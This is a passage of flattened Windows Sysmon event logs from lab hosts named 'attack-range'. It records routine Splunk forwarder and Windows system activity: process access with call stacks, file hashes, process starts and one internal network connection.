Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.443{4F8D34B0-0EB7-6216-0504-000000003902}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:48.786{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC9315FD6DE02AAAF5A08ADADEB629EA,SHA256=932813CCD1957D064246D0EAE62912CB0FF960CE715B502517A9BB98CD25284C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:48.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C93B428F212AA4EC3AA66EF4F82113,SHA256=AB78C9B19DCAECAEEBFD599B381A875B12D527FCAB28019A60C802021C3A715B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:48.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F42BABD048B902BAB7104C96EE8DB8F3,SHA256=5D48FAFE0EF7656B17FA2558F3F8FFA0B861C078AA052AFA6D8A40C32CB39925,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.564{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53259-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000214602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0EB9-6216-0804-000000003902}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB9-6216-0804-000000003902}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.990{4F8D34B0-0EB9-6216-0804-000000003902}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.817{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0293208F7FB869486C21D4702E761A66,SHA256=5B7690AAEC548CA90B759B5F68E45FFDCFAB6C716761F190A2DFADE98BD833D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:49.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECAF56EF9D5F3AD4ACFBC53F8EE4FA9,SHA256=871742919836F7F86A975FFB1291E31994E9C87BA9DEA3993F5A970A65260271,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.536{4F8D34B0-0EB9-6216-0704-000000003902}22641108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB9-6216-0704-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 